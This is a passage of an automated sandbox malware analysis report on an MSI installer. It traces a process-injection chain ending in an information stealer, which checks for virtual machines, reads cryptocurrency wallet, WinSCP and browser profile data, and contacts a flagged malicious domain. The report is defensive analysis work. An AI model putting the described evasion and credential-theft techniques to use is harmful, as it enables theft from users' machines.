                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                      Source: comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
                      Source: comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
                      Source: comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
                      Source: comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
                      Source: comvalidate_ljv3.exe, 0000000A.00000003.2430835895.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2464101114.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2528549271.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2597643516.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2488660096.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2569610517.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2488817743.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2618755936.000000000042C000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2548380575.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2618354577.00000000004AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
                      Source: comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeCode function: 3_2_6C482C08 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6C482C08
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeCode function: 3_2_6C488B27 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,3_2_6C488B27
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe "C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeCode function: 3_2_6C482C08 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6C482C08
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeCode function: 3_2_6C483119 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6C483119
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeCode function: 3_2_6C487F2A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,3_2_6C487F2A
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C43311B5 Sleep,exit,SetUnhandledExceptionFilter,exit,10_2_00007FF6C43311B5

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtProtectVirtualMemory: Direct from: 0x7FF617CF0BA6Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtProtectVirtualMemory: Direct from: 0x7FF617B532A3Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtQueryValueKey: Direct from: 0x14011D93EJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtProtectVirtualMemory: Direct from: 0x7FF6C43F0CF7Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtProtectVirtualMemory: Direct from: 0x7FF6C45784CFJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtClose: Direct from: 0x14011D864
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtQuerySystemInformation: Direct from: 0x7FF6C4477D9BJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtQuerySystemInformation: Direct from: 0x7FF6C43DE8F1Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtProtectVirtualMemory: Direct from: 0x7FF6C447E686Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtAllocateVirtualMemory: Direct from: 0x7FFE221E4B5EJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtQueryValueKey: Direct from: 0x7FF6C440D211Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtClose: Indirect: 0x14012000F
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtQueryInformationProcess: Direct from: 0x7FF6C43F246BJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtCreateFile: Direct from: 0x7FF6C43E3589Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtClose: Direct from: 0x7FF6C44482EE
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtQuerySystemInformation: Direct from: 0x7FF6C450F1BFJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtCreateFile: Direct from: 0x7FF6C456FB08Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6C44493F6Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtProtectVirtualMemory: Direct from: 0x7FFE221C26A1Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeNtSetInformationThread: Direct from: 0x6C482AD0Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF617AB5626Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtReadFile: Direct from: 0x7FF6C43EC0E1Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtEnumerateValueKey: Direct from: 0x7FF6C44BDC03Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtQuerySystemInformation: Direct from: 0x7FF6C43E3283Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtQueryInformationToken: Direct from: 0x7FF6C4409A61Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtQueryValueKey: Direct from: 0x7FF6C440CF1BJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6C4335626Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtClose: Direct from: 0x7FF6C4572249
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF617AB96FDJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6C43396FDJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6C4444A3AJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtCreateThreadEx: Direct from: 0x7FF617AB5790Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6C45107BFJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtQueryValueKey: Direct from: 0x7FF6C440D688Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtSetInformationProcess: Direct from: 0x7FF6C43F302BJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtQuerySystemInformation: Direct from: 0x7FF6C44459A7Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6C43EC084Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtProtectVirtualMemory: Direct from: 0x7FF6C4486A36Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtClose: Direct from: 0x7FF6C457223B
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtAllocateVirtualMemory: Direct from: 0x14011D808Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtProtectVirtualMemory: Direct from: 0x7FF617CFA11EJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtProtectVirtualMemory: Direct from: 0x7FF6C43DED9DJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtProtectVirtualMemory: Direct from: 0x7FF617CFA1F6Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtProtectVirtualMemory: Direct from: 0x7FF6C4570BA6Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtQuerySystemInformation: Direct from: 0x7FF617BF7D9BJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6C4517FF9Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtQueryValueKey: Direct from: 0x7FF6C440D427Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtRequestWaitReplyPort: Direct from: 0x7FF6C447E982Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtQuerySystemInformation: Direct from: 0x7FF6C43E57A7Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtOpenKeyEx: Direct from: 0x7FF6C440CB50Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtReadVirtualMemory: Direct from: 0x7FF6C456CDE2Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtCreateThreadEx: Direct from: 0x7FF6C4335790Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtProtectVirtualMemory: Direct from: 0x7FF6C43DB4E0Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtReadFile: Direct from: 0x14011D832Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtProtectVirtualMemory: Direct from: 0x7FF6C457A1F6Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtQueryInformationToken: Direct from: 0x7FF6C4482BBEJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtProtectVirtualMemory: Direct from: 0x7FF6C43D32A3Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtProtectVirtualMemory: Direct from: 0x7FF6C457A11EJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtQueryInformationToken: Direct from: 0x7FF6C44424A0Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6C43E336BJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeNtSetInformationThread: Direct from: 0x6E542AD0Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtQueryInformationProcess: Direct from: 0x7FF6C43F2050Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF617CF0FD4Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6C4570FD4Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeNtSetInformationThread: Direct from: 0x6F912AD0Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtCreateFile: Direct from: 0x14011D7A4Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeNtQuerySystemInformation: Direct from: 0x76EF63E1Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtClose: Direct from: 0x7FF6C4572227
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtQuerySystemInformation: Direct from: 0x7FF6C447EBD0Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtCreateFile: Direct from: 0x7FF6C456CFC5Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6C4510425Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtSetInformationProcess: Direct from: 0x7FF6C43F1F69Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtAllocateVirtualMemory: Direct from: 0x140120A3CJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6C43E3A30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe protection: read writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe base: 14011BC08Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe base: 37C010Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe base: 14011BC08Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe base: 2BD010Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_000000014000BFFC CharLowerW,lstrcmpiW,lstrcmpiW,lstrlenW,lstrlenW,lstrcmpiW,lstrcmpW,lstrlenW,GetActiveWindow,GetTempPathW,lstrlenW,GetModuleFileNameW,CopyFileW,MessageBoxW,lstrlenW,ShellExecuteW,GetModuleFileNameW,CharLowerW,lstrlenW,10_2_000000014000BFFC
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeJump to behavior
                      Source: IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2631090799.0000000140156000.00000002.00000001.01000000.0000001A.sdmpBinary or memory string: )[%d] Shell_TrayWndTrayNotifyWnd
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: @System@LoadResourceModule$qqrpbo,GetModuleFileNameW,RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,lstrcpynW,GetThreadLocale,GetLocaleInfoW,lstrlenW,lstrcpynW,LoadLibraryExW,lstrcpynW,LoadLibraryExW,lstrcpynW,LoadLibraryExW,2_2_5000C58C
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: @Sysutils@GetLocaleStr$qqriix20System@UnicodeString,GetLocaleInfoW,@System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi,@System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString,2_2_50025B78
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: @Sysutils@GetLocaleChar$qqriib,GetLocaleInfoW,2_2_50025BC4
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeCode function: GetLocaleInfoA,3_2_6C48986C
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
                      Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_50022830 @Sysutils@CurrentYear$qqrv,GetLocalTime,2_2_50022830
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_000000014000EE50 GetDlgItem,GetUserNameW,wsprintfW,GetDlgItem,SetWindowTextW,GetDlgItem,SetWindowTextW,10_2_000000014000EE50
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_0000000140026184 GetTimeZoneInformation,10_2_0000000140026184
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_0000000140026080 GetVersionExW,GetVersionExW,10_2_0000000140026080
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeKey opened: HKEY_CURRENT_USER\Software\monero-project\monero-coreJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2 OverrideJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ProfilesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-releaseJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\z6bny8rn.defaultJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F05C @Rtlconsts@_sCannotListenOnOpen,@Rtlconsts@_sCannotCreateSocket,@Rtlconsts@_sSocketAlreadyOpen,@Rtlconsts@_sCantChangeWhileActive,@Rtlconsts@_sSocketMustBeBlocking,@Rtlconsts@_sSocketIOError,2_2_5000F05C
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | 1 Replication Through Removable Media | 2 Native API | 11 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 11 Input Capture | 11 Peripheral Device Discovery | Remote Desktop Protocol | 11 Data from Local System | 2 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 11 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 1 Credentials in Registry | 1 Account Discovery | SMB/Windows Admin Shares | 1 Screen Capture | 13 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 212 Process Injection | 2 Obfuscated Files or Information | NTDS | 14 File and Directory Discovery | Distributed Component Object Model | 11 Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 DLL Side-Loading | LSA Secrets | 137 System Information Discovery | SSH | 2 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 File Deletion | Cached Domain Credentials | 111 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 21 Masquerading | DCSync | 1 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Virtualization/Sandbox Evasion | Proc Filesystem | 2 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 212 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Behavior Graph (image not preserved). ID: 1565498; Sample: ONHQNHFT.msi; Startdate: 30/11/2024; Architecture: WINDOWS; Score: 100.
Main process chain shown in the graph: msiexec.exe -> IDRBackup.exe -> IDRBackup.exe -> cmd.exe -> comvalidate_ljv3.exe -> gakaroli.online (172.67.141.133, 443, 49766, 49772, CLOUDFLARENETUS, United States).

Source | Detection | Scanner | Label | Link
ONHQNHFT.msi | 13% | ReversingLabs | Binary.Trojan.Generic |
ONHQNHFT.msi | 13% | Virustotal | | Browse
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\ikltbdky | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\wqosufsc | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\Aplanogamete\datastate.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\Aplanogamete\madbasic_.bpl | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\Aplanogamete\maddisAsm_.bpl | 3% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\Aplanogamete\madexcept_.bpl | 3% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\Aplanogamete\rtl120.bpl | 3% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\Aplanogamete\sqlite3.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\Aplanogamete\vcl120.bpl | 3% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\Aplanogamete\vclx120.bpl | 3% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\toolsync_RO\datastate.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\toolsync_RO\madbasic_.bpl | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\toolsync_RO\maddisAsm_.bpl | 3% | ReversingLabs | |
C:\Users\user\AppData\Roaming\toolsync_RO\madexcept_.bpl | 3% | ReversingLabs | |
C:\Users\user\AppData\Roaming\toolsync_RO\rtl120.bpl | 3% | ReversingLabs | |
C:\Users\user\AppData\Roaming\toolsync_RO\sqlite3.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\toolsync_RO\vcl120.bpl | 3% | ReversingLabs | |
C:\Users\user\AppData\Roaming\toolsync_RO\vclx120.bpl | 3% | ReversingLabs | |
                      No Antivirus matches
                      No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
gakaroli.online | 172.67.141.133 | true | true | | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
172.67.141.133 | gakaroli.online | United States | | 13335 | CLOUDFLARENETUS | true
                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                    Analysis ID:1565498
                                                                                    Start date and time:2024-11-30 02:23:08 +01:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 8m 53s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                    Number of analysed new started processes analysed:21
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:1
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample name:ONHQNHFT.msi
                                                                                    Detection:MAL
                                                                                    Classification:mal100.spyw.expl.evad.winMSI@21/48@1/1
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 66.7%
                                                                                    HCA Information:Failed
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .msi
